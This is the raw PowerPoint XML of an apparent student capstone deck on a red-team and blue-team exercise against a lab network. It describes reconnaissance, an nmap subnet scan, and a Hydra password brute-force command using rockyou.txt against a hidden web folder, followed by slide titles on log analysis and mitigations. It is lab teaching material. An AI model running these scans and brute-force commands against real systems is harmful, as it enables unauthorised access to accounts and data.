            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hostname: Capstone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hostname: Elk server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IPv4: 192.168.86.97</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS: Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hostname: Work Station</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:b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9" name="Google Shape;1059;p57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Network Topology</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p5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D0FDA9-64A2-418A-B4F5-FDB3D54F603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3600" y="994063"/>
            <a:ext cx="6347114" cy="373584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5</a:t>
            </a:fld>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Google Shape;1067;p58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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Red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8" name="Google Shape;1068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4" name="Google Shape;1074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5" name="Google Shape;1075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76" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3046950429"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="8346600" cy="3577125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{3EA61311-CA8F-4FB8-A01F-2EC4968B2E09}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="27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Work Station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192.168.1.1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 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192.168.1.90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Collects the attack events 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 (web server)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192.168.1.105</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:br>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                      </a:b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Victim Machine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 Server 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192.168.1.100</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:br>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                      </a:b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 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82" name="Google Shape;1082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3" name="Google Shape;1083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84" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1399010819"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="8362500" cy="3509800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{3EA61311-CA8F-4FB8-A01F-2EC4968B2E09}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="278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5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012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 Ports</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="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Refers to ports that can be accessed from a remote location </a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="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It can reveal information about the system/network architecture as well as leak software versions, its content and even cause denial of service attacks. </a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="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010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Authentication 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Refers to any scenario in which the login credentials are flawed/vulnerable due to weak passwords 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Attacker’s can use Brute Force to easily access the user’s login credentials. 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45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Remote Command Execution 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Gives an Attacker the ability to remotely exploit a vulnerable machine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Attacker can freely run/execute commands on the user’s machine and steal sensitive information. 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Exploitation: [Open Ports]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090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Processes: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NAMP was used to run a port scan that showed Port 22 and Port 80 were open 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3" name="Google Shape;1093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9" name="Google Shape;1099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200" b="1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A sucessful connection was made to port 22 that showed the victim’s virtual machine is vulnerable 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1" name="Google Shape;1101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2" name="Google Shape;1102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3" name="Google Shape;1103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4" name="Google Shape;1104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61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mmand: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" sz="1200" b="1" dirty="0"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5000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>root@Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t> 192.168.1.0/24</a:t>
            </a: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Tx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" b="1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[Weak Authentication]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1865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Processes: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tools/processes that was used to crack the passwords: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Hydra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rockyou.txt file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Crackstation.net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4" name="Google Shape;1114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0" name="Google Shape;1120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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1368478"/>
            <a:ext cx="2428500" cy="3365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b="1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Hydra command assisted in  uncovering the login credentials for Ashton which led to a “secret folder” that provided step by step to uncover Ryan’s login crendetials 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Using Crackstation.net led to uncovering Ryan’s login credentials that helped locate the company’s  webdav server.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2" name="Google Shape;1122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3" name="Google Shape;1123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4" name="Google Shape;1124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5" name="Google Shape;1125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62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Commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"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hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a: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 -P rockyou.txt -s 80 -f -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>vV</a:t>
            </a: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 192.168.1.105 http-get http://192.168.1.105/company_folders/secret_folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
            </a:b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6920</TotalTime>
  <Words>1322</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>253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Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System  By: Syed Rahman Date: 07-30-2020</vt:lpstr>
      <vt:lpstr>Table of Contents </vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: [Open Ports]</vt:lpstr>
      <vt:lpstr>Exploitation: [Weak Authentication]</vt:lpstr>
      <vt:lpstr>Exploitation: [Remote Command Execution]</vt:lpstr>
      <vt:lpstr>Blue Team Log Analysis and  Attack Characterization</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan</vt:lpstr>
      <vt:lpstr>Analysis: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Analysis: Uncovering the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Analysis: Finding the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Blue Team Proposed Alarms and  Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Mitigation: Blocking the Port Scan</vt:lpstr>
      <vt:lpstr>Mitigation: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Mitigation: Preventing Brute Force Attacks</vt:lpstr>
      <vt:lpstr>Mitigation: Detecting the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Mitigation: Identifying Reverse Shell Uploads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Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</dc:title>
  <dc:creator>Syed Rahman</dc:creator>
  <cp:lastModifiedBy>Evan Fletcher</cp:lastModifiedBy>
  <cp:revision>53</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-01T22:07:27Z</dcterms:modified>
</cp:coreProperties>
</file>